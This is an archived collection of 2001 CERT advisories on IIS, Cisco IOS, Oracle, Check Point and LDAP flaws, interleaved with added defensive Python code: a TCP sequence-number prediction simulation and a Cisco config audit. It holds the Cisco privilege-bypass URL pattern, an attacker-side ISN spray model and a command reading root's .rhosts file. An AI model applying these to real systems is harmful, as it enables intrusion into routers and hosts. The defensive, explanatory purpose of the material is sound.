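On a real host, feed `assess()` the output of `ps -ef`, `netstat -an` and `cat ~root/.rhosts`; the IIS pattern matches the decoded path as IIS writes it to its log, so it also catches the %c0%af-style requests the original traversal used once IIS has normalized them.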
Copyright 2001 Carnegie Mellon University.
Revision History May 08, 2001: Initial Release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBOvd6LAYcfu8gsZJZAQFyUAP8DVaGiB1G7LM2FFsx5YEWEIPFD8Qt/HDI A+GTyi/LA2JUAVCA5GX5GCMqMOoKEczYJCAIysoacal7YOJOTZliTqCQQV1tbK+8 8J3IdSRBo5oKsAKeQ5M2Hg78uZPGJwOwooNoQDsKzxVJXo0Bng3YBtiIVG3flg6x 8IoirGdclIw= =+B8w -----END PGP SIGNATURE----- From - Tue May 15 12:35:15 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f4FJP9O13898; Tue, 15 May 2001 12:25:09 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id LAA19379; Tue, 15 May 2001 11:11:38 -0400 (EDT) Date: Tue, 15 May 2001 11:11:38 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 15 May 2001 11:06:56 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 Subject: CERT Advisory CA-2001-12 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: d928562cf9462ea2b2a4e027446462b7 Status: RO X-Status: X-Keywords: X-UID: 9 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-12 Superfluous Decoding Vulnerability in IIS Original release date: May 15, 2001 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Systems running Microsoft IIS Overview A serious vulnerability in Microsoft IIS may allow remote intruders to execute commands on an IIS web server. This vulnerability closely resembles a previous vulnerability in IIS that was widely exploited. The CERT/CC urges IIS administrators to take action to correct this vulnerability. I. Description URIs may be encoded according to RFC 2396. Among other things, this RFC provides an encoding for arbitrary octets using the percent sign (%) and hexadecimal characters. 
Quoting from RFC 2396:

   An escaped octet is encoded as a character triplet, consisting of the percent character "%" followed by the two hexadecimal digits representing the octet code. For example, "%20" is the escaped encoding for the US-ASCII space character.

      escaped = "%" hex hex
      hex     = digit | "A" | "B" | "C" | "D" | "E" | "F"

Like all web servers, Microsoft IIS decodes input URIs to a canonical format. Thus, the following encoded string:

   A%20Filename%20With%20Spaces

will get decoded to

   A Filename With Spaces

Unfortunately, IIS decodes some of the input twice. The second decoding is superfluous. Security checks are applied to the results of the first decoding, but IIS utilizes the results of the second decoding. If the results of the first decoding pass the security checks and the results of the second decoding refer to a valid file, access will be granted to the file even if it should not be. More information is available at

http://www.microsoft.com/technet/security/bulletin/MS01-026.asp
http://www.nsfocus.com/english/homepage/sa01-02.htm
http://www.kb.cert.org/vuls/id/789543

Note that this does not permit intruders to bypass ACLs enforced by the filesystem, only security checks performed by IIS. We encourage you to configure your web server according to the guidelines provided in

http://www.microsoft.com/technet/security/iis5chk.asp
http://www.microsoft.com/technet/security/iischk.asp
http://www.microsoft.com/technet/security/tools.asp

These guidelines can help you reduce your exposure to this problem, and possibly to problems that have not yet been discovered. This issue was discovered by NSFocus. The CVE Project has assigned the following identifier to this vulnerability:

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0333

This vulnerability has many similarities to the Web Server Folder Directory Traversal Vulnerability, which has been widely exploited. For more information on that vulnerability, see

http://www.kb.cert.org/vuls/id/111677

II.
Impact

Intruders can run arbitrary commands with the privileges of the IUSR_machinename account.

III. Solutions

Apply a patch from your vendor

Information on patches from Microsoft is available at
http://www.microsoft.com/technet/security/bulletin/MS01-026.asp

Additional advice on securing IIS web servers is available from
http://www.microsoft.com/technet/security/iis5chk.asp
http://www.microsoft.com/technet/security/tools.asp

Appendix A. Vendor Information

Microsoft Corporation
The following documents regarding this vulnerability are available from Microsoft:
http://www.microsoft.com/technet/security/bulletin/MS01-026.asp

Authors: Shawn Hernan.
______________________________________________________________________
This document is available from: http://www.cert.org/advisories/CA-2001-12.html
______________________________________________________________________
Copyright 2001 Carnegie Mellon University. Revision History May 15, 2001: Initial Release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBOwFD9wYcfu8gsZJZAQEc0AP6A7XLQiQ7to6uzTeOyFRb+vXUBI1zBmT1 TvVwLodq6wfeS0vG/+Ta0KC28CFthDs9vUrw6HTnVeeFilKRqUhPgR8Izgd56ePc SKalqxv41DRvkusTlvrygFw1IUzdCJ0/EzWUiRpqu1QV7ZWmNTTVG4ycoEM++cLh 67h5IqMR/iU= =z3yR -----END PGP SIGNATURE----- From - Tue May 29 16:03:18 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f4TMsAB13115; Tue, 29 May 2001 15:54:10 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id QAA20018; Tue, 29 May 2001 16:49:27 -0400 (EDT) Date: Tue, 29 May 2001 16:49:27 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 29 May 2001 16:44:44 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Summary CS-2001-02 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL:
d1d6c17acfa8dea020395d17b151ae05 Status: RO X-Status: X-Keywords: X-UID: 10 -----BEGIN PGP SIGNED MESSAGE----- CERT Summary CS-2001-02 May 29, 2001 Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems. Past CERT summaries are available from: CERT Summaries http://www.cert.org/summaries/ ______________________________________________________________________ Recent Activity Since the last regularly scheduled CERT summary, issued in February 2001 (CS-2001-01), we have seen a significant increase in reconnaissance activity, a number of self-propagating worms, and active exploitation of vulnerabilities in snmpxdmid, BIND and IIS by intruders. For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change. CERT/CC Current Activity http://www.cert.org/current/current_activity.html 1. sadmind/IIS Worm The CERT/CC has received reports from more than 400 sites affected by a piece of self-propagating malicious code (referred to here as the sadmind/IIS worm). This worm uses two well-known vulnerabilities to compromise Solaris systems and deface web pages running on IIS servers. Reports indicate more than 500 Solaris machines have been compromised by the sadmind/IIS worm and more than 6000 IIS servers have been defaced. 
Sites running either Solaris or IIS are strongly encouraged to review CA-2001-11 and those running IIS should review the advisories listed below in the "Other Recent IIS Security Issues" section as well. CERT Advisory CA-2001-11: sadmind/IIS Worm http://www.cert.org/advisories/CA-2001-11.html 2. Other Recent IIS Security Issues The CERT/CC has recently published information on two new vulnerabilities in IIS. Given the current level of exploitation of IIS by intruders and the sadmind/IIS worm, the CERT/CC strongly encourages sites to review the following advisories and take appropriate steps to protect IIS servers. + Superfluous Decoding Vulnerability in IIS A serious vulnerability in Microsoft IIS may allow remote intruders to execute commands on an IIS web server. This vulnerability closely resembles a previous vulnerability in IIS that was widely exploited. The CERT/CC urges IIS administrators to take action to correct this vulnerability. CERT Advisory CA-2001-12: Superfluous Decoding Vulnerability in IIS http://www.cert.org/advisories/CA-2001-12.html + Buffer Overflow Vulnerability in Microsoft IIS 5.0 A vulnerability exists in Microsoft IIS 5.0 running on Windows 2000 that allows a remote intruder to run arbitrary code on the victim machine, allowing them to gain complete administrative control of the machine. A proof-of-concept exploit is publicly available for this vulnerability, which increases the urgency that system administrators apply the patch. CERT Advisory CA-2001-10: Buffer Overflow Vulnerability in Microsoft IIS 5.0 http://www.cert.org/advisories/CA-2001-10.html Additional advice on securing IIS web servers is available from: Microsoft Technet Security Tools http://www.microsoft.com/technet/security/tools.asp 3. Exploitation of snmpXdmid The CERT/CC has received dozens of reports indicating that a vulnerability in snmpXdmid is being actively exploited. 
Exploitation of this vulnerability allows an intruder to gain privileged (root) access to the system. CERT Advisory CA-2001-05: Exploitation of snmpXdmid http://www.cert.org/advisories/CA-2001-05.html 4. Exploitation of BIND Vulnerabilities On January 29, 2001, the CERT/CC published CERT Advisory CA-2001-02, detailing multiple vulnerabilities in multiple versions of ISC BIND nameserver software. Two of the vulnerabilities described in the advisory are still being actively exploited by the intruder community to compromise systems. CERT Incident Note IN-2001-03: Exploitation of BIND Vulnerabilities http://www.cert.org/incident_notes/IN-2001-03.html CERT Advisory CA-2001-02: Multiple Vulnerabilities in BIND http://www.cert.org/advisories/CA-2001-02.html 5. The "cheese" Worm The CERT/CC has observed in public and private reports a recent pattern of activity surrounding probes to TCP port 10008. We have obtained an artifact called the "cheese" worm which may contribute to this pattern. CERT Incident Note IN-2001-05: The "cheese" Worm http://www.cert.org/incident_notes/IN-2001-05.html 6. Increase in Reconnaissance Activity Over the past several weeks, the CERT/CC has observed a significant increase in network reconnaissance activity. While some of this traffic may be attributed to the sadmind/IIS worm or the "cheese" worm, reports indicate active scanning for known vulnerabilities in other network services as well. In addition, we have seen a significant increase in the number of generalized port scans of hosts. In order to minimize exposure to this activity, the CERT/CC recommends that sites review and apply vendor-supplied security patches, disable non-critical network services, and actively monitor system and network logs for unusual activity. 7. Statistical Weaknesses in TCP/IP Initial Sequence Numbers A new vulnerability has been identified which is present when using random increments to constantly increase TCP ISN values over time. 
Systems are vulnerable if they have not incorporated RFC 1948 or equivalent improvements, or do not use cryptographically secure network protocols like IPsec. CERT Advisory CA-2001-09: Statistical Weaknesses in TCP/IP Initial Sequence Numbers http://www.cert.org/advisories/CA-2001-09.html _________________________________________________________________ Collaboration between the CERT Coordination Center and the Internet Security Alliance Using its standard process for collaborating with industry organizations, the CERT/CC, as part of the SEI, has entered into an agreement with the Electronic Industries Alliance, a not-for-profit organization in Virginia, to support the activity of the Internet Security Alliance (ISA). ISA is a member organization that is focused on the overall improvement of Internet security. Internet Security Alliance http://www.isalliance.org Frequently Asked Questions (FAQ) about the collaboration between CERT Coordination Center and the Internet Security Alliance http://www.cert.org/faq/certcc_ISA.html _________________________________________________________________ What's New and Updated Since the last CERT Summary, we have published new and updated * Advisories http://www.cert.org/advisories/ * Incident Notes http://www.cert.org/incident_notes/ * CERT/CC Statistics http://www.cert.org/stats/cert_stats.html * Annual Reports http://www.cert.org/annual_rpts/ ______________________________________________________________________ This document is available from: http://www.cert.org/summaries/CS-2001-02.html ______________________________________________________________________
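Item 7 above names the weak scheme (a counter advanced by random increments) and the remedy (RFC 1948, which offsets a clock by a keyed hash of the connection's 4-tuple). The following simulation is an added example, not analysis from CA-2001-09: it measures how often an attacker who has sampled a handful of ISNs for his own connections can land a fixed budget of guesses on the ISN issued to a different client. The increment range, the clock step, the spray budget and the addresses are assumed values chosen for the simulation.

```python
"""Random-increment ISNs versus RFC 1948 ISNs, simulated.  Added example
for the ISN item in CS-2001-02; the attacker model, step sizes and clock
rate are this example's own assumptions, not figures from CA-2001-09."""
import hashlib
import random

MASK = 0xFFFFFFFF


class RandomIncrementISN:
    """Counter bumped by a random amount per connection, the 'random
    increments' scheme the summary describes.  The 4-tuple is ignored."""

    def __init__(self, rng, max_step=1 << 16):
        self.rng, self.max_step = rng, max_step
        self.state = rng.getrandbits(32)

    def next_isn(self, *_four_tuple) -> int:
        self.state = (self.state + self.rng.randrange(1, self.max_step)) & MASK
        return self.state


class RFC1948ISN:
    """ISN = M + F(local, lport, remote, rport, secret): M is a 4-microsecond
    counter and F the low 32 bits of MD5 over the 4-tuple and a boot-time
    secret, as RFC 1948 suggests."""

    CLOCK_STEP = 250_000   # assumption: about 1 s between connections at 4 us per tick

    def __init__(self, rng):
        self.secret = rng.getrandbits(128).to_bytes(16, "big")
        self.m = 0

    def next_isn(self, local, lport, remote, rport) -> int:
        self.m = (self.m + self.CLOCK_STEP) & MASK
        key = f"{local}:{lport}:{remote}:{rport}".encode() + self.secret
        f = int.from_bytes(hashlib.md5(key).digest()[-4:], "big")
        return (self.m + f) & MASK


def spray_window(observed, budget=1 << 17):
    """Attacker's guess: next ISN = last observed + the median step seen,
    with `budget` sequence numbers sprayed around that prediction."""
    steps = sorted((b - a) & MASK for a, b in zip(observed, observed[1:]))
    centre = (observed[-1] + steps[len(steps) // 2]) & MASK
    return (centre - budget // 2) & MASK, (centre + budget // 2) & MASK


def in_window(isn, lo, hi) -> bool:
    """Membership test that wraps around the 32-bit sequence space."""
    return ((isn - lo) & MASK) <= ((hi - lo) & MASK)


def hit_rate(generator_class, trials=200, probes=8, seed=1) -> float:
    """Fraction of trials in which the victim's ISN lands inside the spray
    window after the attacker sampled `probes` ISNs of his own."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        gen = generator_class(rng)
        mine = [gen.next_isn("10.0.0.1", 80, "198.51.100.9", 40000 + i)
                for i in range(probes)]
        lo, hi = spray_window(mine)
        victim = gen.next_isn("10.0.0.1", 80, "192.0.2.7", 5151)
        hits += in_window(victim, lo, hi)
    return hits / trials


def same_tuple_step(seed=3) -> int:
    """RFC 1948 stays monotonic for one 4-tuple by design: two ISNs for the
    same connection differ by the clock advance only."""
    gen = RFC1948ISN(random.Random(seed))
    a = gen.next_isn("10.0.0.1", 80, "192.0.2.7", 5151)
    b = gen.next_isn("10.0.0.1", 80, "192.0.2.7", 5151)
    return (b - a) & MASK


if __name__ == "__main__":
    print("random increments:", hit_rate(RandomIncrementISN))
    print("RFC 1948:         ", hit_rate(RFC1948ISN))
```

With bounded random increments the attacker's window always covers the next value, so a spoofed connection is a matter of spraying roughly 2^17 segments; with RFC 1948 the victim's ISN is offset by a hash the attacker cannot evaluate, so the same budget hits at about 2^17 / 2^32. Note the design trade-off `same_tuple_step` shows: RFC 1948 keeps ISNs monotonic for a given 4-tuple so that old segments are not mistaken for new ones, which is exactly why the secret must not be guessable.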
Copyright ©2001 Carnegie Mellon University.
-----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBOxQFvgYcfu8gsZJZAQGhBwQAnOGWyK2i3snaTskm3SvFycSFQCIhatKI 0+UrWPAX4oR5dYcygJwg23/QSuN2deQuLatfJSRKHW+hYKVgJlHxoBED0CPspkhx ezU47UcqLFKk2QI3Bt3cG22i28qxjpEOZNn325MfrxJg/q2XdUFZcpqkdian5otJ Lv+z0JyeV/M= =I/U5 -----END PGP SIGNATURE----- From - Thu Jun 28 11:22:34 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f5SIE3i20196; Thu, 28 Jun 2001 11:14:03 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id LAA28669; Thu, 28 Jun 2001 11:28:08 -0400 (EDT) Date: Thu, 28 Jun 2001 11:28:08 -0400 (EDT) Received: by canaveral.red.cert.org; Thu, 28 Jun 2001 11:21:08 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 Subject: CERT Advisory CA-2001-14 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: de4d45cc77b338e8001e59640cfa6b62 Status: RO X-Status: X-Keywords: X-UID: 11 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-14 Cisco IOS HTTP Server Authentication Vulnerability Original release date: June 28, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Cisco IOS systems using local authentication databases with the HTTP server enabled Overview A problem with the HTTP server component of Cisco IOS system software allows an intruder to execute privileged commands on Cisco routers if local authentication databases are used. I. Description By sending a particular URL to a Cisco IOS device with the HTTP server enabled, a remote attacker may be able to execute commands at the highest privilege level (15). The malicious URL is of the following form: http://
/level/XX/exec/... The value of XX is a number between 16 and 99. While a single malicious URL will not work consistently against all devices, the limited number of possible URLs can allow an attacker to try each URL until the attack succeeds. This problem occurs if the system is using a local authentication database, but not if the Terminal Access Controller Access Control System (TACACS+) or Radius authentication systems are used. Cisco has published a security advisory describing this vulnerability and its solutions in more detail at: http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html

II. Impact A remote attacker can execute arbitrary commands at the highest privilege level (15) on systems using local authentication databases with the HTTP server enabled. This access allows a remote attacker to inspect or change the configuration of the device, effectively allowing complete control.

III. Solution Upgrade your IOS Release Cisco has published detailed information about upgrading affected Cisco IOS software to correct this vulnerability. System managers are encouraged to upgrade to one of the non-vulnerable releases. Disable the HTTP server Because this problem exists in the handling of HTTP requests, disabling the HTTP server prevents the vulnerability from being exploited. Information about disabling the HTTP server is provided in the Cisco security advisory on this topic. Enable TACACS+ or Radius Authentication This vulnerability is not present when the Terminal Access Controller Access Control System (TACACS+) or Radius authentication systems are used. Enabling one of these authentication mechanisms in place of local authentication databases will prevent the vulnerability from being exploited. Information about enabling TACACS+ or Radius can be found in the following Cisco document: http://www.cisco.com/warp/public/480/tacplus.shtml

Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. 
When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Cisco Systems Cisco has published a security advisory describing this vulnerability at http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html _________________________________________________________________ The CERT/CC thanks Cisco Systems for their advisory, on which this document is based. _________________________________________________________________ Author: Cory F. C. Cohen ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-14.html ______________________________________________________________________
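An added example for the configuration side of the advice in Section III (not Cisco's code or advisory text): a small audit over a running-config that reports whether the HTTP server is on and whether HTTP authentication is backed by the local database (including the enable-password default) or by TACACS+/RADIUS through AAA, plus a matcher for the /level/XX/exec/ request form from Section I. The configurations are constructed; the IOS command forms and the default authentication method are this example's reading of IOS syntax, not statements from the advisory.

```python
"""Audit a Cisco IOS running-config for the exposure in CA-2001-14: HTTP
server on, with HTTP authentication against local users or the enable
password rather than TACACS+/RADIUS.  Added example; the configs are
constructed and the reading of IOS command syntax is this example's own."""
import re

# Constructed running-config excerpts: the exposed case and the two fixes
# the advisory lists (disable the HTTP server, or authenticate via TACACS+/RADIUS).
VULNERABLE_CONFIG = """\
hostname edge-rtr
!
username admin privilege 15 password 7 094F471A1A0A
!
ip http server
ip http authentication local
"""

FIXED_BY_DISABLING = """\
hostname edge-rtr
!
no ip http server
"""

FIXED_BY_AAA = """\
hostname edge-rtr
!
aaa new-model
aaa authentication login default group tacacs+ local
tacacs-server host 192.0.2.10
tacacs-server key 7 0A1B2C3D4E5F
!
ip http server
ip http authentication aaa
"""

REMOTE_METHODS = re.compile(r"\bgroup (?:tacacs\+|radius)")
LEVEL_PROBE = re.compile(r"/level/(\d{2})/exec(?:/|$)")


def audit_http_exposure(config: str) -> dict:
    """Report HTTP server state, the HTTP auth method and whether the
    combination matches the vulnerable case (HTTP on + local database)."""
    lines = [line.strip() for line in config.splitlines()]

    http_server = None            # None: not in config, platform default applies
    for line in lines:
        if line == "ip http server":
            http_server = True
        elif line == "no ip http server":
            http_server = False

    auth = "enable"               # assumption: IOS default when the line is absent
    for line in lines:
        m = re.fullmatch(r"ip http authentication (\S+)", line)
        if m:
            auth = m.group(1)

    if auth == "tacacs":
        uses_remote_db = True
    elif auth == "aaa":
        # AAA only helps if the default login method list reaches a remote server
        login = [l for l in lines if l.startswith("aaa authentication login default ")]
        uses_remote_db = any(REMOTE_METHODS.search(l) for l in login)
    else:                         # 'local' or 'enable': the local-database cases
        uses_remote_db = False

    return {
        "http_server": http_server,
        "http_auth": auth,
        "exposed": http_server is True and not uses_remote_db,
        "fix": None if uses_remote_db or http_server is False else
               "add 'no ip http server', or point HTTP auth at TACACS+/RADIUS via AAA",
    }


def is_level_probe(path: str) -> bool:
    """True for request paths of the form /level/XX/exec/... with XX in 16..99,
    the shape the advisory gives for the malicious URL."""
    m = LEVEL_PROBE.search(path)
    return bool(m) and 16 <= int(m.group(1)) <= 99


if __name__ == "__main__":
    for name, cfg in (("vulnerable", VULNERABLE_CONFIG),
                      ("no http", FIXED_BY_DISABLING),
                      ("aaa/tacacs+", FIXED_BY_AAA)):
        print(name, audit_http_exposure(cfg))
    print(is_level_probe("/level/42/exec/show/running-config"))
```

When `http_server` comes back `None` the audit cannot decide from the config alone; check `show ip http server status` on the device (or the platform default for that release) before treating it as safe. The probe matcher is meant for access logs or an IDS rule, where a burst of requests walking XX from 16 to 99 against a router is the "try each URL" pattern described in Section I.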
Copyright 2001 Carnegie Mellon University. Revision History June 28, 2001: Initial release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBOztJpAYcfu8gsZJZAQFoOgP/UBtU8yqFbhHf/xD82wCewpBi6NhBAk2M 66WLouQrnXIMWzRWnLmRNV74p+7u+92IxFS/u+TqTzIfByUOtwXLswcRRvHlXYXk 511yHK01wlfgtgv7wwg8doYyCUGPamznNnVEAnbZ/9zoM6Y1nuvUEUgOnvvT9ZMu sCRihIv2WGg= =THYA -----END PGP SIGNATURE----- From - Tue Jul 3 17:45:34 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f640h6Z06239; Tue, 3 Jul 2001 17:43:06 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id RAA21344; Tue, 3 Jul 2001 17:36:22 -0400 (EDT) Date: Tue, 3 Jul 2001 17:36:22 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 3 Jul 2001 17:31:24 -0400 Message-Id: 
From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-16 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 1203b7da17eefdd4ba3eff2c30537dd8 Status: RO X-Status: X-Keywords: X-UID: 12 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-16 Oracle 8i contains buffer overflow in TNS listener Original release date: July 03, 2001 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Systems running Oracle 8i Overview A vulnerability in Oracle 8i allows remote intruders to assume control of database servers running on victim machines. If the Oracle server is running on a Windows system, an intruder may also be able to gain control of the underlying operating system. I. Description COVERT Labs at PGP Security have discovered a buffer overflow vulnerability in Oracle 8i that allows intruders to execute arbitrary code with the privileges of the TNS listener process. The vulnerability occurs in a section of code that is executed prior to authentication, so an intruder does not require a username or password. For more information, see the COVERT Labs Security Advisory, available at http://www.pgp.com/research/covert/advisories/050.asp II. Impact An intruder who exploits the vulnerability can remotely execute arbitrary code. On UNIX systems, this code runs as the 'oracle' user. If running on Windows systems, the intruder's code will run in the Local System security context. In either case, the attacker can gain control of the database server on the victim machine. On Windows systems, the intruder can also gain administrative control of the operating system. III. Solutions Install a patch from Oracle. More information is available in Appendix A. 
Appendix A Oracle Oracle has issued an alert for this vulnerability at http://otn.oracle.com/deploy/security/pdf/nai_net8_bof.pdf Oracle has fixed this potential security vulnerability in the Oracle9i database server. Oracle is in the process of backporting the fix to supported Oracle8i database server Releases 8.1.7 and 8.1.6 and Oracle8 Release 8.0.6 on all platforms. The Oracle bug number for the patch is 1489683. Download the patch for your platform from Oracle's Worldwide Support web site, Metalink: http://metalink.oracle.com Please check Metalink periodically for patch availability if the patch for your platform is not yet available. _________________________________________________________________ Our thanks to COVERT Labs at PGP Security for the information contained in their advisory. _________________________________________________________________ This document was written by Shawn V. Hernan. If you have feedback concerning this document, please send email to: mailto:cert@cert.org?Subject=[VU#620495]%20Feedback%20CA-2001-16 Copyright 2001 Carnegie Mellon University. Revision History July 03, 2001: Initial Release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBO0I28QYcfu8gsZJZAQF1AQP/QvE4AO+I5HP8VXK850g83NlPiFCxlG1K 51GjO/KCFqK78DoBK9YWvxGaZiR6xKaxYJbGftcJh1zKwNqiRDIGk1OdeW873uhj bR8vjobFMzNSZU5y9gXPa9YQWdEg1KozQH1VuNsBxRnmHu6Yi3WANbmZXYcRck2x lhP8noPes/Q= =nVFt -----END PGP SIGNATURE----- From - Mon Jul 9 13:10:52 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f69K8mF04341; Mon, 9 Jul 2001 13:08:49 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id NAA16657; Mon, 9 Jul 2001 13:35:09 -0400 (EDT) Date: Mon, 9 Jul 2001 13:35:09 -0400 (EDT) Received: by canaveral.red.cert.org; Mon, 9 Jul 2001 13:30:01 -0400 Message-Id: 
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2001-17

CERT Advisory CA-2001-17 Check Point RDP Bypass Vulnerability

Original release date: July 09, 2001
Last revised: --
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

* Check Point VPN-1 and FireWall-1 Version 4.1

Overview

A vulnerability in Check Point FireWall-1 and VPN-1 may allow an intruder to pass traffic through the firewall on port 259/UDP.

I. Description

Inside Security GmbH has discovered a vulnerability in Check Point FireWall-1 and VPN-1 that allows an intruder to bypass the firewall. The default FireWall-1 management rules allow arbitrary RDP (Reliable Data Protocol) connections to traverse the firewall. RFC-908 and RFC-1151 describe the Reliable Data Protocol (RDP). Quoting from RFC-908:

   The Reliable Data Protocol (RDP) is designed to provide a reliable data transport service for packet-based applications such as remote loading and debugging. RDP was designed to have much of the same functionality as TCP, but it has some advantages over TCP in certain situations.

Note that the RDP of RFC-908 is a transport protocol carried directly over IP (IP protocol number 27), not over UDP. The traffic at issue here is UDP datagrams to port 259 carrying the RDP header that Check Point's products recognize, so the RFC quotation describes the stated purpose of a protocol of the same name rather than the packets that actually traverse the firewall.

FireWall-1 and VPN-1 include support for RDP, but they do not provide adequate security controls. Quoting from the advisory provided by Inside Security GmbH:

   By adding a faked RDP header to normal UDP traffic any content can be passed to port 259 on any remote host on either side of the firewall.

For more information, see the Inside Security GmbH security advisory, available at
http://www.inside-security.de/advisories/fw1_rdp.html

Although the CERT/CC has not seen any incident activity related to this vulnerability, we do recommend that all affected sites upgrade their Check Point software as soon as possible.

II. Impact

An intruder can pass UDP traffic with arbitrary content through the firewall on port 259 in violation of implied security policies. If an intruder can gain control of a host inside the firewall, he may be able to use this vulnerability to tunnel arbitrary traffic across the firewall boundary. Additionally, even if an intruder does not have control of a host inside the firewall, he may be able to use this vulnerability as a means of exploiting another vulnerability in software listening passively on the internal network. Finally, an intruder may be able to use this vulnerability to launch certain kinds of denial-of-service attacks.

III. Solutions

Install a patch from Check Point Software Technologies. More information is available in Appendix A.

Until a patch can be applied, you may be able to reduce your exposure to this vulnerability by configuring your router to block access to 259/UDP at your network perimeter.

Appendix A

Check Point

Check Point has issued an alert for this vulnerability at
http://www.checkpoint.com/techsupport/alerts/

Download the patch from Check Point's web site:
http://www.checkpoint.com/techsupport/downloads.html

Appendix B. - References

1. http://www.inside-security.de/advisories/fw1_rdp.html
2. http://www.kb.cert.org/vuls/id/310295
3. http://www.ietf.org/rfc/rfc908.txt
4. http://www.ietf.org/rfc/rfc1151.txt

_________________________________________________________________

Our thanks to Inside Security GmbH for the information contained in their advisory.

_________________________________________________________________

This document was written by Ian A. Finlay. If you have feedback concerning this document, please send email to:
mailto:cert@cert.org?Subject=Feedback CA-2001-17 [VU#310295]

Copyright 2001 Carnegie Mellon University.

Revision History
July 09, 2001: Initial Release

Date: Tue, 17 Jul 2001 00:43:29 -0400 (EDT)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2001-18

CERT Advisory CA-2001-18 Multiple Vulnerabilities in Several Implementations of the Lightweight Directory Access Protocol (LDAP)

Original release date: July 16, 2001
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* iPlanet Directory Server, version 5.0 Beta and versions up to and including 4.13
* Certain versions of IBM SecureWay running under Solaris and Windows 2000
* Lotus Domino R5 Servers (Enterprise, Application, and Mail), prior to 5.0.7a
* Teamware Office for Windows NT and Solaris, prior to version 5.3ed1
* Qualcomm Eudora WorldMail for Windows NT, version 2
* Microsoft Exchange 5.5 LDAP Service (Hotfix pending)
* Network Associates PGP Keyserver 7.0, prior to Hotfix 2
* Oracle 8i Enterprise Edition
* OpenLDAP, 1.x prior to 1.2.12 and 2.x prior to 2.0.8

Overview

Several implementations of the Lightweight Directory Access Protocol (LDAP) contain vulnerabilities that may allow denial-of-service attacks, unauthorized privileged access, or both. If your site uses any of the products listed in this advisory, the CERT/CC encourages you to follow the advice provided in the Solution section below.

I. Description

